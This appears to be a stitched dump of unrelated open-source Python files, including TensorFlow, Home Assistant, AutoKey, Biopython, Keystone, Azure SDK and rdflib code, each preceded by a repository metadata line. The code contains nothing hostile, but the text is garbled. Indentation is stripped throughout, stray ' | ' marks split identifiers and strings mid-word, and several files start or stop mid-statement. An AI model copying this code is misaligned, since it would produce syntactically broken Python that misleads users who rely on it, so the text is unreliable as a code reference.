rsp = test_lib.lib_execute_ssh_cmd(node1_ip, host_username, host_password, cmd, 180)
if not rsp:
rsp = test_lib.lib_execute_ssh_cmd(node2_ip, host_username, host_password, cmd, 180)
time.sleep(180)
test_stub.exercise_connection(600)
| vm = test_stub.create_basic_vm()
vm.check()
vm.destroy()
test_util.test_pass('After Recover Node with One command, Create VM Test Success')
#Will be called | only if exception happens in test().
def error_cleanup():
global vm
if vm:
try:
vm.destroy()
except:
pass
|
karllessard/tensorflow | tensorflow/python/training/saving/saveable_object.py | Python | apache-2.0 | 3,646 | 0.004663 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIN | D, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================== | =========
"""Types for specifying saving and loading behavior."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
class SaveSpec(object):
"""Class used to describe tensor slices that need to be saved."""
def __init__(self, tensor, slice_spec, name, dtype=None, device=None):
"""Creates a `SaveSpec` object.
Args:
tensor: the tensor to save or callable that produces a tensor to save.
If the value is `None`, the `SaveSpec` is ignored.
slice_spec: the slice to be saved. See `Variable.SaveSliceInfo`.
name: the name to save the tensor under.
dtype: The data type of the Tensor. Required if `tensor` is callable.
Used for error checking in the restore op.
device: The device generating and consuming this tensor. Required if
`tensor` is callable. Used to group objects to save by device.
"""
self._tensor = tensor
self.slice_spec = slice_spec
self.name = name
if callable(self._tensor):
if dtype is None or device is None:
raise AssertionError(
"When passing a callable `tensor` to a SaveSpec, an explicit "
"dtype and device must be provided.")
self.dtype = dtype
self.device = device
else:
self.dtype = tensor.dtype
if device is not None:
self.device = device
else:
self.device = tensor.device
@property
def tensor(self):
return self._tensor() if callable(self._tensor) else self._tensor
class SaveableObject(object):
"""Base class for saving and restoring saveable objects."""
def __init__(self, op, specs, name):
"""Creates a `SaveableObject` object.
Args:
op: the "producer" object that this class wraps; it produces a list of
tensors to save. E.g., a "Variable" object saving its backing tensor.
specs: a list of SaveSpec, each element of which describes one tensor to
save under this object. All Tensors must be on the same device.
name: the name to save the object under.
"""
self.op = op
self.specs = specs
self.name = name
@property
def optional_restore(self):
"""A hint to restore assertions that this object is optional."""
return False # Default to required
@property
def device(self):
"""The device for SaveSpec Tensors."""
return self.specs[0].device
def restore(self, restored_tensors, restored_shapes):
"""Restores this object from 'restored_tensors'.
Args:
restored_tensors: the tensors that were loaded from a checkpoint
restored_shapes: the shapes this object should conform to after
restore, or None.
Returns:
An operation that restores the state of the object.
Raises:
ValueError: If the object cannot be restored using the provided
parameters.
"""
# pylint: disable=unused-argument
raise ValueError("Calling an abstract method.")
|
HydrelioxGitHub/home-assistant | homeassistant/helpers/config_validation.py | Python | apache-2.0 | 26,479 | 0 | """Helpers for config validation using voluptuous."""
import inspect
import logging
import os
import re
from datetime import (timedelta, datetime as datetime_sys,
time as time_sys, date as date_sys)
from socket import _GLOBAL_DEFAULT_TIMEOUT
from typing import Any, Union, TypeVar, Callable, Sequence, Dict, Optional
from urllib.parse import urlparse
import voluptuous as vol
from pkg_resources import parse_version
import homeassistant.util.dt as dt_util
from homeassistant.const import (
CONF_PLATFORM, CONF_SCAN_INTERVAL, TEMP_CELSIUS, TEMP_FAHRENHEIT,
CONF_ALIAS, CONF_ENTITY_ID, CONF_VALUE_TEMPLATE, WEEKDAYS,
CONF_CONDITION, CONF_BELOW, CONF_ABOVE, CONF_TIMEOUT, SUN_EVENT_SUNSET,
SUN_EVENT_SUNRISE, CONF_UNIT_SYSTEM_IMPERIAL, CONF_UNIT_SYSTEM_METRIC,
ENTITY_MATCH_ALL, CONF_ENTITY_NAMESPACE, __version__)
from homeassistant.core import valid_entity_id, split_entity_id
from homeassistant.exceptions import TemplateError
from homeassistant.helpers import template as template_helper
from homeassistant.helpers.logging import KeywordStyleAdapter
from homeassistant.util import slugify as util_slugify
# pylint: disable=invalid-name
TIME_PERIOD_ERROR = "offset {} should be format 'HH:MM' or 'HH:MM:SS'"
OLD_SLUG_VALIDATION = r'^[a-z0-9_]+$'
OLD_ENTITY_ID_VALIDATION = r"^(\w+)\.(\w+)$"
# Keep track of invalid slugs and entity ids found so we can create a
# persistent notification. Rare temporary exception to use a global.
INVALID_SLUGS_FOUND = {}
INVALID_ENTITY_IDS_FOUND = {}
INVALID_EXTRA_KEYS_FOUND = []
# Home Assistant types
byte = vol.All(vol.Coerce(int), vol.Range(min=0, max=255))
small_float = vol.All(vol.Coerce(float), vol.Range(min=0, max=1))
positive_int = vol.All(vol.Coerce(int), vol.Range(min=0))
latitude = vol.All(vol.Coerce(float), vol.Range(min=-90, max=90),
msg='invalid latitude')
longitude = vol.All(vol.Coerce(float), vol.Range(min=-180, max=180),
msg='invalid longitude')
gps = vol.ExactSequence([latitude, longitude])
sun_event = vol.All(vol.Lower, vol.Any(SUN_EVENT_SUNSET, SUN_EVENT_SUNRISE))
port = vol.All(vol.Coerce(int), vol.Range(min=1, max=65535))
# typing typevar
T = TypeVar('T')
# Adapted from:
# https://github.com/alecthomas/voluptuous/issues/115#issuecomment-144464666
def has_at_least_one_key(*keys: str) -> Callable:
"""Validate that at least one key exists."""
def validate(obj: Dict) -> Dict:
"""Test keys exist in dict."""
if not isinstance(obj, dict):
raise vol.Invalid('expected dictionary')
for k in obj.keys():
if k in keys:
return obj
raise vol.Invalid('must contain one of {}.'.format(', '.join(keys)))
return validate
def has_at_most_one_key(*keys: str) -> Callable:
"""Validate that zero keys exist or one key exists."""
def validate(obj: Dict) -> Dict:
"""Test zero keys exist or one key exists in dict."""
if not isinstance(obj, dict):
raise vol.Invalid('expected dictionary')
if len(set(keys) & set(obj)) > 1:
raise vol.Invalid(
'must contain at most one of {}.'.format(', '.join(keys))
)
return obj
return validate
def boolean(value: Any) -> bool:
"""Validate and coerce a boolean value."""
if isinstance(value, str):
value = value.lower()
if value in ('1', 'true', 'yes', 'on', 'enable'):
return True
if value in ('0', 'false', 'no', 'off', 'disable'):
return False
raise vol.Invalid('invalid boolean value {}'.format(value))
return bool(value)
def isdevice(value):
"""Validate that value is a real device."""
try:
os.stat(value)
return str(value)
except OSError:
raise vol.Invalid('No device at {} found'.format(value))
def matches_regex(regex):
"""Validate that the value is a string that matches a regex."""
regex = re.compile(regex)
def validator(value: Any) -> str:
"""Validate that value matches the given regex."""
if not isinstance(value, str):
raise vol.Invalid('not a string value: {}'.format(value))
if not regex.match(value):
raise vol.Invalid('value {} does not match regular expression {}'
.format(value, regex.pattern))
return value
return validator
def is_regex(value):
"""Validate that a string is a valid regular expression."""
try:
r = re.compile(value)
return r
except TypeError:
raise vol.Invalid("value {} is of the wrong type for a regular "
"expression".format(value))
except re.error:
raise vol.Invalid("value {} is not a valid regular expression".format(
value))
def isfile(value: Any) -> str:
"""Validate that the value is an existing file."""
if value is None:
raise vol.Invalid('None is not file')
file_in = os.path.expanduser(str(value))
if not os.path.isfile(file_in):
raise vol.Invalid('not a file')
if not os.access(file_in, os.R_OK):
raise vol.Invalid('file not readable')
return file_in
def isdir(value: Any) -> str:
"""Validate that the value is an existing dir."""
if value is None:
raise vol.Invalid('not a directory')
dir_in = os.path.expanduser(str(value))
if not os.path.isdir(dir_in):
raise vol.Invalid('not a directory')
if not os.access(dir_in, os.R_OK):
raise vol.Invalid('directory not readable')
return dir_in
def ensure_list(value: Union[T, Sequence[T]]) -> Sequence[T]:
"""Wrap value in list if it is not one."""
if value is None:
return []
return value if isinstance(value, list) else [value]
def entity_id(value: Any) -> str:
"""Validate Entity ID."""
value = string(value).lower()
if valid_entity_id(value):
return value
if re.match(OLD_ENTITY_ID_VALIDATION, value):
# To ease the breaking change, we allow old slugs for now
# Remove after 0.94 or 1.0
fixed = '.'.join(util_slugify(part) for part in value.split('.', 1))
INVALID_ENTITY_IDS_FOUND[value] = fixed
logging.getLogger(__name__).warning(
"Found invalid entity_ | id %s, please update with %s. This "
"will become a breaking change.",
value, fixed
)
return value
raise vol.Invalid('Entity ID {} is an invalid entity id'.format(value))
def entity_ids(value: Union[str, Sequence]) -> Sequence[str]:
"""Validate Entity IDs."""
if value is None:
raise vol.Invalid('Entity IDs can n | ot be None')
if isinstance(value, str):
value = [ent_id.strip() for ent_id in value.split(',')]
return [entity_id(ent_id) for ent_id in value]
comp_entity_ids = vol.Any(
vol.All(vol.Lower, ENTITY_MATCH_ALL),
entity_ids
)
def entity_domain(domain: str):
"""Validate that entity belong to domain."""
def validate(value: Any) -> str:
"""Test if entity domain is domain."""
ent_domain = entities_domain(domain)
return ent_domain(value)[0]
return validate
def entities_domain(domain: str):
"""Validate that entities belong to domain."""
def validate(values: Union[str, Sequence]) -> Sequence[str]:
"""Test if entity domain is domain."""
values = entity_ids(values)
for ent_id in values:
if split_entity_id(ent_id)[0] != domain:
raise vol.Invalid(
"Entity ID '{}' does not belong to domain '{}'"
.format(ent_id, domain))
return values
return validate
def enum(enumClass):
"""Create validator for specified enum."""
return vol.All(vol.In(enumClass.__members__), enumClass.__getitem__)
def icon(value):
"""Validate icon."""
value = str(value)
if ':' in value:
return value
raise vol.Invalid('Icons should be specifed on the form "prefix:name"')
time_period_dict = vol.All(
dict, vol.Schema({
'days': vol.Coerce(int),
'hours': vol.Coerce(int),
'mi |
guoci/autokey-py3 | lib/autokey/iomediator/_iomediator.py | Python | gpl-3.0 | 9,297 | 0.00484 | import threading
import queue
import logging
from ..configmanager import ConfigManager
from ..configmanager_constants import INTERFACE_TYPE
from ..interface import XRecordInterface, AtSpiInterface
from autokey.model import SendMode
from .key import Key
from .constants import X_RECORD_INTERFACE, KEY_SPLIT_RE, MODIFIERS, HELD_MODIFIERS
CURRENT_INTERFACE = None
_logger = logging.getLogger("iomediator")
class IoMediator(threading.Thread):
"""
The IoMediator is responsible for tracking the state of modifier keys and
interfacing with the various Interface classes to obtain the correct
characters to pass to the expansion service.
This class must not store or maintain any configuration details.
"""
# List of targets interested in receiving keypress, hotkey and mouse events
listeners = []
def __init__(self, service):
threading.Thread.__init__(self, name="KeypressHandler-thread")
self.queue = queue.Queue()
self.listeners.append(service)
self.interfaceType = ConfigManager.SETTINGS[INTERFACE_TYPE]
# Modifier tracking
self.modifiers = {
Key.CONTROL: False,
Key.ALT: False,
Key.ALT_GR: False,
Key.SHIFT: False,
Key.SUPER: False,
Key.HYPER: False,
Key.META: False,
Key.CAPSLOCK: False,
Key.NUMLOCK: False
}
if self.interfaceType == X_RECORD_INTERFACE:
self.interface = XRecordInterface(self, service.app)
else:
self.interface = AtSpiInterface(self, service.app)
global CURRENT_INTERFACE
CURRENT_INTERFACE = self.interface
_logger.info("Created IoMediator instance, current interface is: {}".format(CURRENT_INTERFACE))
def shutdown(self):
_logger.debug("IoMediator shutting down")
self.interface.cancel()
self.queue.put_nowait((None, None))
_logger.debug("Waiting for IoMediator thread to end")
self.join()
_logger.debug("IoMediator shutdown completed")
# Callback methods for Interfaces ----
def set_modifier_state(self, modifier, state):
_logger.debug("Set modifier %s to %r", modifier, state)
self.modifiers[modifier] = state
def handle_modifier_dow | n(self, modifier):
"""
Updates the state of the given modifier key to 'pressed'
| """
_logger.debug("%s pressed", modifier)
if modifier in (Key.CAPSLOCK, Key.NUMLOCK):
if self.modifiers[modifier]:
self.modifiers[modifier] = False
else:
self.modifiers[modifier] = True
else:
self.modifiers[modifier] = True
def handle_modifier_up(self, modifier):
"""
Updates the state of the given modifier key to 'released'.
"""
_logger.debug("%s released", modifier)
# Caps and num lock are handled on key down only
if modifier not in (Key.CAPSLOCK, Key.NUMLOCK):
self.modifiers[modifier] = False
def handle_keypress(self, keyCode, window_info):
"""
Looks up the character for the given key code, applying any
modifiers currently in effect, and passes it to the expansion service.
"""
self.queue.put_nowait((keyCode, window_info))
def run(self):
while True:
keyCode, window_info = self.queue.get()
if keyCode is None and window_info is None:
break
numLock = self.modifiers[Key.NUMLOCK]
modifiers = self.__getModifiersOn()
shifted = self.modifiers[Key.CAPSLOCK] ^ self.modifiers[Key.SHIFT]
key = self.interface.lookup_string(keyCode, shifted, numLock, self.modifiers[Key.ALT_GR])
rawKey = self.interface.lookup_string(keyCode, False, False, False)
for target in self.listeners:
target.handle_keypress(rawKey, modifiers, key, window_info)
self.queue.task_done()
def handle_mouse_click(self, rootX, rootY, relX, relY, button, windowInfo):
for target in self.listeners:
target.handle_mouseclick(rootX, rootY, relX, relY, button, windowInfo)
# Methods for expansion service ----
def send_string(self, string: str):
"""
Sends the given string for output.
"""
if not string:
return
string = string.replace('\n', "<enter>")
string = string.replace('\t', "<tab>")
_logger.debug("Send via event interface")
self.__clearModifiers()
modifiers = []
for section in KEY_SPLIT_RE.split(string):
if len(section) > 0:
if Key.is_key(section[:-1]) and section[-1] == '+' and section[:-1] in MODIFIERS:
# Section is a modifier application (modifier followed by '+')
modifiers.append(section[:-1])
else:
if len(modifiers) > 0:
# Modifiers ready for application - send modified key
if Key.is_key(section):
self.interface.send_modified_key(section, modifiers)
modifiers = []
else:
self.interface.send_modified_key(section[0], modifiers)
if len(section) > 1:
self.interface.send_string(section[1:])
modifiers = []
else:
# Normal string/key operation
if Key.is_key(section):
self.interface.send_key(section)
else:
self.interface.send_string(section)
self.__reapplyModifiers()
def paste_string(self, string, pasteCommand: SendMode):
if len(string) > 0:
_logger.debug("Send via clipboard")
self.interface.send_string_clipboard(string, pasteCommand)
def remove_string(self, string):
backspaces = -1 # Start from -1 to discount the backspace already pressed by the user
for section in KEY_SPLIT_RE.split(string):
if Key.is_key(section):
# TODO: Only a subset of keys defined in Key are printable, thus require a backspace.
# Many keys are not printable, like the modifier keys or F-Keys.
# If the current key is a modifier, it may affect the printability of the next character.
# For example, if section == <alt>, and the next section begins with "+a", both the "+" and "a" are not
# printable, because both belong to the keyboard combination "<alt>+a"
backspaces += 1
else:
backspaces += len(section)
self.send_backspace(backspaces)
def send_key(self, keyName):
keyName = keyName.replace('\n', "<enter>")
self.interface.send_key(keyName)
def press_key(self, keyName):
keyName = keyName.replace('\n', "<enter>")
self.interface.fake_keydown(keyName)
def release_key(self, keyName):
keyName = keyName.replace('\n', "<enter>")
self.interface.fake_keyup(keyName)
def fake_keypress(self, keyName):
keyName = keyName.replace('\n', "<enter>")
self.interface.fake_keypress(keyName)
def send_left(self, count):
"""
Sends the given number of left key presses.
"""
for i in range(count):
self.interface.send_key(Key.LEFT)
def send_right(self, count):
for i in range(count):
self.interface.send_key(Key.RIGHT)
def send_up(self, count):
"""
Sends the gi |
dbmi-pitt/DIKB-Micropublication | scripts/mp-scripts/Bio/PDB/Residue.py | Python | apache-2.0 | 4,886 | 0.010847 | # Copyright (C) 2002, Thomas Hamelryck (thamelry@binf.ku.dk)
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
# My Stuff
from PDBExceptions import PDBConstructionException
from Entity import Entity, DisorderedEntityWrapper
__doc__="Residue class, used by Structure objects."
_atom_name_dict={}
_atom_name_dict["N"]=1
_atom_name_dict["CA"]=2
_atom_name_dict["C"]=3
_atom_name_dict["O"]=4
class Residue(Entity):
"""
Represents a residue. A Residue object stores atoms.
"""
def __init__(self, id, resname, segid):
self.level="R"
self.disordered=0
self.resname=resname
self.segid=segid
Entity.__init__(self, id)
# Special methods
def __repr__(self):
resname=self.get_resname()
hetflag, resseq | , icode=self.get_id()
full_id=(resname, hetflag, resseq, icode)
return "<Residue %s het=%s resseq=%s icode=%s>" % full_id
# Private methods
def _sort(self, a1, a2):
"""Sort the Atom objects.
Atoms are sorted alphabetically according to their name,
but N, CA, C, O always come f | irst.
Arguments:
o a1, a2 - Atom objects
"""
name1=a1.get_name()
name2=a2.get_name()
if name1==name2:
return(cmp(a1.get_altloc(), a2.get_altloc()))
if _atom_name_dict.has_key(name1):
index1=_atom_name_dict[name1]
else:
index1=None
if _atom_name_dict.has_key(name2):
index2=_atom_name_dict[name2]
else:
index2=None
if index1 and index2:
return cmp(index1, index2)
if index1:
return -1
if index2:
return 1
return cmp(name1, name2)
# Public methods
def add(self, atom):
"""Add an Atom object.
Checks for adding duplicate atoms, and raises a
PDBConstructionException if so.
"""
atom_id=atom.get_id()
if self.has_id(atom_id):
raise PDBConstructionException, "Atom %s defined twice in residue %s" % (atom_id, self)
Entity.add(self, atom)
def sort(self):
self.child_list.sort(self._sort)
def flag_disordered(self):
"Set the disordered flag."
self.disordered=1
def is_disordered(self):
"Return 1 if the residue contains disordered atoms."
return self.disordered
def get_resname(self):
return self.resname
def get_unpacked_list(self):
"""
Returns the list of all atoms, unpack DisorderedAtoms."
"""
atom_list=self.get_list()
undisordered_atom_list=[]
for atom in atom_list:
if atom.is_disordered():
undisordered_atom_list=(undisordered_atom_list+ atom.disordered_get_list())
else:
undisordered_atom_list.append(atom)
return undisordered_atom_list
def get_segid(self):
return self.segid
class DisorderedResidue(DisorderedEntityWrapper):
"""
DisorderedResidue is a wrapper around two or more Residue objects. It is
used to represent point mutations (e.g. there is a Ser 60 and a Cys 60 residue,
each with 50 % occupancy).
"""
def __init__(self, id):
DisorderedEntityWrapper.__init__(self, id)
def __repr__(self):
resname=self.get_resname()
hetflag, resseq, icode=self.get_id()
full_id=(resname, hetflag, resseq, icode)
return "<DisorderedResidue %s het=%s resseq=%i icode=%s>" % full_id
def add(self, atom):
residue=self.disordered_get()
if not atom.is_disordered()==2:
# Atoms in disordered residues should have non-blanc
# altlocs, and are thus represented by DisorderedAtom objects.
resname=residue.get_resname()
het, resseq, icode=residue.get_id()
# add atom anyway, if PDBParser ignores exception the atom will be part of the residue
residue.add(atom)
raise PDBConstructionException, "Blank altlocs in duplicate residue %s (%s, %i, %s)" % (resname, het, resseq, icode)
residue.add(atom)
def sort(self):
"Sort the atoms in the child Residue objects."
for residue in self.disordered_get_list():
residue.sort()
def disordered_add(self, residue):
"""Add a residue object and use its resname as key.
Arguments:
o residue - Residue object
"""
resname=residue.get_resname()
# add chain parent to residue
chain=self.get_parent()
residue.set_parent(chain)
assert(not self.disordered_has_id(resname))
self[resname]=residue
self.disordered_select(resname)
|
figo-connect/schwifty | schwifty/__init__.py | Python | mit | 248 | 0 | try:
from importlib.metadata import version
except ImportError:
from importlib_metadata import version # type: | ignore
from schwifty.bic import BIC
from schwifty. | iban import IBAN
__all__ = ["IBAN", "BIC"]
__version__ = version(__name__)
|
genius1611/Keystone | keystone/backends/sqlalchemy/api/role.py | Python | apache-2.0 | 8,044 | 0.002362 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystone.backends.sqlalchemy import get_session, models
from keystone.backends.api import BaseRoleAPI
class RoleAPI(BaseRoleAPI):
# pylint: disable=W0221
def create(self, values):
role = models.Role()
role.update(values)
role.save()
return role
def delete(self, id, session=None):
if not session:
session = get_session()
with session.begin():
role = self.get(id, session)
session.delete(role)
def get(self, id, session=None):
if not session:
session = get_session()
return session.query(models.Role).filter_by(id=id).first()
def get_by_name(self, name, session=None):
if not session:
session = get_session()
return session.query(models.Role).filter_by(name=name).first()
def get_by_service(self, service_id, session=None):
if not session:
session = get_session()
result = session.query(models.Role).\
filter_by(service_id=service_id).all()
return result
def get_all(self, session=None):
if not session:
session = get_session()
return session.query(models.Role).all()
def get_page(self, marker, limit, session=None):
if not session:
session = get_session()
if marker:
return session.query(models.Role).filter("id>:marker").params(\
marker='%s' % marker).order_by(\
models.Role.id.desc()).limit(limit).all()
else:
return session.query(models.Role).order_by(\
models.Role.id.desc()).limit(limit).all()
def ref_get_page(self, marker, limit, user_id, tenant_id, session=None):
if not session:
session = get_session()
query = session.query(models.UserRoleAssociation).\
filter_by(user_id=user_id)
if tenant_id:
query = query.filter_by(tenant_id=tenant_id)
else:
query = query.filter("tenant_id is null")
if marker:
return query.filter("id>:marker").params(\
marker='%s' % marker).order_by(\
models.UserRoleAssociation.id.desc()).limit(limit).all()
else:
return query.order_by(\
models.UserRoleAssociation.id.desc()).limit(limit).all()
def ref_get_all_global_roles(self, user_id, session=None):
if not session:
session = get_session()
return session.query(models.UserRoleAssociation).\
filter_by(user_id=user_id).filter("tenant_id is null").all()
def ref_get_all_tenant_roles(self, user_id, tenant_id, session=None):
if not session:
session = get_session()
return session.query(models.UserRoleAssociation).\
filter_by(user_id=user_id).filter_by(tenant_id=tenant_id).all()
def ref_get(self, id, session=None):
if not session:
session = get_session()
result = session.query(models.UserRoleAssociation).filter_by(id=id).\
first()
return result
def ref_delete(self, id, session=None):
if not session:
session = get_session()
with session.begin():
role_ref = self.ref_get(id, session)
session.delete(role_ref)
def get_page_markers(self, marker, limit, session=None):
if not session:
session = get_session()
first = session.query(models.Role).order_by(\
models.Role.id).first()
last = session.query(models.Role).order_by(\
models.Role.id.desc()).first()
if first is None:
return (None, None)
if marker is None:
marker = first.id
next_page = session.query(models.Role).filter("id > :marker").params(\
marker='%s' % marker).order_by(\
models.Role.id).limit(limit).all()
prev_page = session.query(models.Role).filter("id < :marker").params(\
marker='%s' % marker).order_by(\
models.Role.id.desc()).limit(int(limit)).all()
if len(next_page) == 0:
next_page = last
else:
for | t in next_page:
next_page = t
if len(prev_page) == 0:
prev_page = first
else:
for t in prev_page:
prev_page = t
if prev_page.id == marker:
| prev_page = None
else:
prev_page = prev_page.id
if next_page.id == last.id:
next_page = None
else:
next_page = next_page.id
return (prev_page, next_page)
def ref_get_page_markers(self, user_id, tenant_id, marker,
limit, session=None):
if not session:
session = get_session()
query = session.query(models.UserRoleAssociation).filter_by(\
user_id=user_id)
if tenant_id:
query = query.filter_by(tenant_id=tenant_id)
else:
query = query.filter("tenant_id is null")
first = query.order_by(\
models.UserRoleAssociation.id).first()
last = query.order_by(\
models.UserRoleAssociation.id.desc()).first()
if first is None:
return (None, None)
if marker is None:
marker = first.id
next_page = query.\
filter("id > :marker").\
params(marker='%s' % marker).\
order_by(models.UserRoleAssociation.id).\
limit(limit).\
all()
prev_page = query.\
filter("id < :marker").\
params(marker='%s' % marker).\
order_by(models.UserRoleAssociation.id.desc()).\
limit(int(limit)).\
all()
if len(next_page) == 0:
next_page = last
else:
for t in next_page:
next_page = t
if len(prev_page) == 0:
prev_page = first
else:
for t in prev_page:
prev_page = t
if prev_page.id == marker:
prev_page = None
else:
prev_page = prev_page.id
if next_page.id == last.id:
next_page = None
else:
next_page = next_page.id
return (prev_page, next_page)
def ref_get_by_role(self, role_id, session=None):
if not session:
session = get_session()
result = session.query(models.UserRoleAssociation).\
filter_by(role_id=role_id).all()
return result
def ref_get_by_user(self, user_id, role_id, tenant_id, session=None):
if not session:
session = get_session()
if tenant_id is None:
result = session.query(models.UserRoleAssociation).\
filter_by(user_id=user_id).filter("tenant_id is null").\
filter_by(role_id=role_id).first()
else:
result = session.query(models.UserRoleAssociation).\
filter_by(user_id=user_id).filter_by(tenant_id=tenant_id).\
filter_by(role_id=role_id).first()
return result
def get():
return RoleAPI()
|
Azure/azure-sdk-for-python | sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2021_01_15/operations/_domain_registration_provider_operations.py | Python | mit | 5,798 | 0.004484 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microso | ft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------- | -----------------------------
import functools
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_operations_request(
**kwargs: Any
) -> HttpRequest:
api_version = "2021-01-15"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/providers/Microsoft.DomainRegistration/operations')
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
class DomainRegistrationProviderOperations(object):
"""DomainRegistrationProviderOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.web.v2021_01_15.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list_operations(
self,
**kwargs: Any
) -> Iterable["_models.CsmOperationCollection"]:
"""Implements Csm operations Api to exposes the list of available Csm Apis under the resource
provider.
Description for Implements Csm operations Api to exposes the list of available Csm Apis under
the resource provider.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CsmOperationCollection or the result of
cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2021_01_15.models.CsmOperationCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CsmOperationCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_operations_request(
template_url=self.list_operations.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_operations_request(
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("CsmOperationCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_operations.metadata = {'url': '/providers/Microsoft.DomainRegistration/operations'} # type: ignore
|
lrowe/rdflib | test/test_trig.py | Python | bsd-3-clause | 1,653 | 0.012704 | import unittest
import rdflib
import re
from rdflib.py3compat import b
class | TestTrig(unittest.TestCase):
def testEmpty(self):
g=rdflib.Graph()
s=g.serialize(format='trig')
self.assertTrue(s is not None)
def testRepeatTriples(self):
g=rdflib.ConjunctiveGraph()
g.get_context('urn:a').add(( rdflib.URIRef('urn:1'),
rdflib.URIRef('urn:2'),
| rdflib.URIRef('urn:3') ))
g.get_context('urn:b').add(( rdflib.URIRef('urn:1'),
rdflib.URIRef('urn:2'),
rdflib.URIRef('urn:3') ))
self.assertEqual(len(g.get_context('urn:a')),1)
self.assertEqual(len(g.get_context('urn:b')),1)
s=g.serialize(format='trig')
self.assert_(b('{}') not in s) # no empty graphs!
def testSameSubject(self):
g=rdflib.ConjunctiveGraph()
g.get_context('urn:a').add(( rdflib.URIRef('urn:1'),
rdflib.URIRef('urn:p1'),
rdflib.URIRef('urn:o1') ))
g.get_context('urn:b').add(( rdflib.URIRef('urn:1'),
rdflib.URIRef('urn:p2'),
rdflib.URIRef('urn:o2') ))
self.assertEqual(len(g.get_context('urn:a')),1)
self.assertEqual(len(g.get_context('urn:b')),1)
s=g.serialize(format='trig')
self.assertEqual(len(re.findall(b("p1"), s)), 1)
self.assertEqual(len(re.findall(b("p2"), s)), 1)
self.assert_(b('{}') not in s) # no empty graphs!
|
rgeorgiev583/BrainfuckInterpreter | main.py | Python | gpl-3.0 | 263 | 0.003802 | __author__ = 'radoslav'
import bfplatform
bfi = bfplatform.create_bfi_stdio_c | har(
"++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]>>.>---.+++++++..+++.>>.<-.<.+++.------.--------.>>+.>++."
)
bfi.run()
bfi = bfplatform.create_bfi_st | dio_numeric()
bfi.run()
|
mosquito/TelePY | pytils/test/templatetags/helpers.py | Python | gpl-3.0 | 2,137 | 0.006083 | # -*- coding: utf-8 -*-
# pytils - russian-specific string utils
# Copyright (C) 2006-2009 Yury Yurevich
#
# http://pyobject.ru/projects/pytils/
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation, version 2
# of the License.
#
# This program is distributed in the hope that it will be useful,
